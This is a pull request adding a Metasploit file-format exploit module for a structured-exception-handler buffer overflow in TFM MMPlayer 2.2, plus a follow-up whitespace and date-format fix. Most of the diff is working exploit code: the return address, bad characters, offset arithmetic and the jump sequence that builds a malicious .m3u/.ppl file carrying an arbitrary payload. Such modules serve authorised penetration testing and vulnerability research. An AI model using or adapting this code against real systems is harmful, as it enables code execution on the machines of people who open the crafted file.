### PR TITLE
Added TFM MMPlayer (m3u/ppl File) Buffer Overflow module

### DIFF
--- a/modules/exploits/windows/fileformat/tfm_mmplayer_m3u_ppl_bof.rb
+++ b/modules/exploits/windows/fileformat/tfm_mmplayer_m3u_ppl_bof.rb
@@ -1,0 +1,86 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+#   http://metasploit.com/framework/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+	Rank = GreatRanking
+
+	include Msf::Exploit::FILEFORMAT
+
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'		=> 'TFM MMPlayer (m3u/ppl File) Buffer Overflow',
+			'Description'	=> %q{
+				This module exploits a buffer overflow in MMPlayer 2.2
+				The vulnerability is triggered when opening a malformed M3U/PPL file 
+				that contains an overly long string. This results in overwriting a
+				structured exception handler record.
+			},
+			'License'	=> MSF_LICENSE,
+			'Author'	=>
+				[
+					'RjRjh Hack3r',                            # Original discovery and exploit
+					'Brendan Coles <bcoles[at]gmail[dot]com>', # msf exploit
+				],
+			'References'	=>
+				[
+					[ 'EDB', '18656' ], # .m3u
+					[ 'EDB', '18657' ], # .ppl
+				],
+			'DefaultOptions' =>
+				{
+					'ExitFunction' => 'seh',
+					'InitialAutoRunScript' => 'migrate -f',
+				},
+			'Platform'	=> 'win',
+			'Targets'	=>
+				[
+					# Tested on:
+					# Windows XP Pro SP3 - English
+					# Windows 7 Home Basic SP0 - English
+					# Windows Server 2003 Enterprise SP2 - English
+					[ 'Windows Universal', { 'Ret' => 0x00401390 } ], # p/p/r -> MMPlayer.exe
+				],
+			'Payload'	=>
+				{
+					'Size' => 4000,
+					'BadChars' => "\x00\x0a\x0d",
+					'DisableNops' => false,
+				},
+			'Privileged'	 => false,
+			'DisclosureDate' => '23 Mar 2012',
+			'DefaultTarget'	 => 0
+		))
+
+		register_options([OptString.new('FILENAME', [ false, 'The file name.', 'msf.ppl']),], self.class)
+
+	end
+
+	def exploit
+
+		nops   = make_nops(10)
+		sc     = payload.encoded
+		offset = Rex::Text.rand_text_alphanumeric(4103 - sc.length - nops.length)
+		jmp    = Rex::Arch::X86.jmp(-4108)            # near jump 4103 bytes
+		nseh   = Rex::Arch::X86.jmp_short(-7)         # jmp back 7 bytes
+		nseh  << Rex::Text.rand_text_alphanumeric(2)
+		seh    = [target.ret].pack('V')
+
+		sploit  = nops
+		sploit << sc 
+		sploit << offset
+		sploit << jmp
+		sploit << nseh
+		sploit << seh
+
+		# write file
+		file_create(sploit)
+
+	end
+end
+

--- a/modules/exploits/windows/fileformat/tfm_mmplayer_m3u_ppl_bof.rb
+++ b/modules/exploits/windows/fileformat/tfm_mmplayer_m3u_ppl_bof.rb
@@ -17,7 +17,7 @@ class Metasploit3 < Msf::Exploit::Remote
 			'Name'		=> 'TFM MMPlayer (m3u/ppl File) Buffer Overflow',
 			'Description'	=> %q{
 				This module exploits a buffer overflow in MMPlayer 2.2
-				The vulnerability is triggered when opening a malformed M3U/PPL file 
+				The vulnerability is triggered when opening a malformed M3U/PPL file
 				that contains an overly long string. This results in overwriting a
 				structured exception handler record.
 			},
@@ -53,7 +53,7 @@ class Metasploit3 < Msf::Exploit::Remote
 					'DisableNops' => false,
 				},
 			'Privileged'	 => false,
-			'DisclosureDate' => '23 Mar 2012',
+			'DisclosureDate' => 'Mar 23 2012',
 			'DefaultTarget'	 => 0
 		))
 
@@ -72,7 +72,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		seh    = [target.ret].pack('V')
 
 		sploit  = nops
-		sploit << sc 
+		sploit << sc
 		sploit << offset
 		sploit << jmp
 		sploit << nseh


### PR DESCRIPTION
Added TFM MMPlayer (m3u/ppl File) Buffer Overflow module

Exploit module for:

http://www.exploit-db.com/exploits/18656/
http://www.exploit-db.com/exploits/18657/

Tested on:
- Windows XP Pro SP3 - English
- Windows 7 Home Basic SP0 - English
- Windows Server 2003 Enterprise SP2 - English
